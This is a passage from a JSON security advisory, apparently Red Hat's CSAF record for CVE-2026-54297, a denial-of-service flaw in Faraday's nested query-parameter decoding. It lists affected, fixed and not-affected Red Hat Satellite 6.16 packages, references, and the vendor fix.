"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2492252"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Faraday, an HTTP client library. The Faraday::NestedParamsEncoder, which handles nested query parameters, does not limit the depth of nested query strings during decoding. A remote attacker can exploit this by sending a specially crafted query string, causing the application to build an excessively deep data structure. This can lead to a SystemStackError, resulting in a Denial of Service (DoS) by crashing the application\u0027s processing thread or worker.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "faraday: Faraday: Denial of Service via crafted nested query strings",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw has an Important impact as applications utilizing the Faraday HTTP client library in Red Hat products are susceptible to a denial of service. A remote attacker can send a specially crafted nested query string, causing the Faraday::NestedParamsEncoder to create an overly deep data structure. This unbounded recursion exhausts system resources, leading to a SystemStackError and crashing the application\u0027s processing thread.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src"
],
"known_not_affected": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54297"
},
{
"category": "external",
"summary": "RHBZ#2492252",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492252"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54297",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54297"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54297",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54297"
},
{
"category": "external",
"summary": "https://github.com/lostisland/faraday/security/advisories/GHSA-98m9-hrrm-r99r",
"url": "https://github.com/lostisland/faraday/security/advisories/GHSA-98m9-hrrm-r99r"
}
],
"release_date": "2026-06-24T15:50:08.949000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T16:04:50+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor detailed instructions how to apply this update, refer to:\n\nhttps://docs.redhat.com/en/documentation/red_hat_satellite/6.16/html/updating_red_hat_satellite/index",
"product_ids": [
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50223"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
